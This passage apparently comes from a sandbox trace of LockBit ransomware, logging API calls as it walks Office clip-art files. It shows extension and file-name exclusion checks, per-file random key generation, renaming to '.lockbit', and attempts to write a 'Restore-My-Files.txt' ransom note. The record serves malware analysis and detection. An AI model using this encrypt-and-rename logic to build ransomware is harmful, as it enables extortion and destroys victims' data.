(lpString1=".ocx", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.753] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.754] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.754] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01361_.WMF") returned 1 [0162.754] lstrcmpiW (lpString1="ntldr", lpString2="NA01361_.WMF") returned 1 [0162.754] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01361_.WMF") returned 1 [0162.754] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01361_.WMF") returned -1 [0162.754] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01361_.WMF") returned -1 [0162.754] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01361_.WMF") returned 1 [0162.755] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01361_.WMF") returned -1 [0162.755] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.755] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01361_.WMF") returned=".WMF" [0162.755] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.755] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.755] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.756] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.756] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.756] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.756] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01361_.WMF.lockbit") returned 72 [0162.756] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01361_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01361_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0162.756] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.756] malloc (_Size=0x40068) returned 0x3d70450 [0162.757] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=7028) returned 1 [0162.757] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.757] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0162.757] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.758] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0162.758] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0162.762] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01361_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01361_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.762] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.762] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.763] free (_Block=0x1fa2ed8) [0162.763] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01361_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.763] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.763] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.763] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe5b0900, ftCreationTime.dwHighDateTime=0x1bd4b3c, ftLastAccessTime.dwLowDateTime=0x594f87d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbe5b0900, ftLastWriteTime.dwHighDateTime=0x1bd4b3c, nFileSizeHigh=0x0, nFileSizeLow=0x40412, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01368_.WMF", cAlternateFileName="")) returned 1 [0162.763] lstrcmpiW (lpString1=".", lpString2="NA01368_.WMF") returned -1 [0162.763] lstrcmpiW (lpString1="..", lpString2="NA01368_.WMF") returned -1 [0162.763] PathFindExtensionW (pszPath="NA01368_.WMF") returned=".WMF" [0162.763] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.763] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.763] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.763] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.763] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.763] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.764] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.764] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01368_.WMF") returned 1 [0162.765] lstrcmpiW (lpString1="ntldr", lpString2="NA01368_.WMF") returned 1 [0162.765] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01368_.WMF") returned 1 [0162.765] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01368_.WMF") returned -1 [0162.765] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01368_.WMF") returned -1 [0162.765] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01368_.WMF") returned 1 [0162.765] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01368_.WMF") returned -1 [0162.765] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.765] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01368_.WMF") returned=".WMF" [0162.765] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.765] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.765] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.766] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.766] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01368_.WMF.lockbit") returned 72 [0162.766] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01368_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01368_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0162.767] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.767] malloc (_Size=0x40068) returned 0x3f70048 [0162.767] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=263186) returned 1 [0162.767] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.768] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0162.768] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.768] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0162.769] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0162.773] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01368_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01368_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.773] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.773] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.774] free (_Block=0x1fa2ed8) [0162.774] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01368_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.774] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.774] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.774] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8653c600, ftCreationTime.dwHighDateTime=0x1bd4b3c, ftLastAccessTime.dwLowDateTime=0x594f87d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8653c600, ftLastWriteTime.dwHighDateTime=0x1bd4b3c, nFileSizeHigh=0x0, nFileSizeLow=0x2b16e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01421_.WMF", cAlternateFileName="")) returned 1 [0162.777] lstrcmpiW (lpString1=".", lpString2="NA01421_.WMF") returned -1 [0162.777] lstrcmpiW (lpString1="..", lpString2="NA01421_.WMF") returned -1 [0162.777] PathFindExtensionW (pszPath="NA01421_.WMF") returned=".WMF" [0162.777] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.777] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.777] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.777] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.777] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.777] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.777] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.777] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.777] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.777] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.777] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.777] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.778] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.778] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01421_.WMF") returned 1 [0162.779] lstrcmpiW (lpString1="ntldr", lpString2="NA01421_.WMF") returned 1 [0162.779] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01421_.WMF") returned 1 [0162.779] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01421_.WMF") returned -1 [0162.779] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01421_.WMF") returned -1 [0162.779] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01421_.WMF") returned 1 [0162.779] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01421_.WMF") returned -1 [0162.779] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.779] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01421_.WMF") returned=".WMF" [0162.779] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.779] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.779] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.780] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.780] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.780] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.780] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.780] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.780] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.780] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.780] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.780] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.780] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.780] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01421_.WMF.lockbit") returned 72 [0162.780] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01421_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01421_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0162.781] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.781] malloc (_Size=0x40068) returned 0x3df0008 [0162.781] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=176494) returned 1 [0162.781] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.782] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e 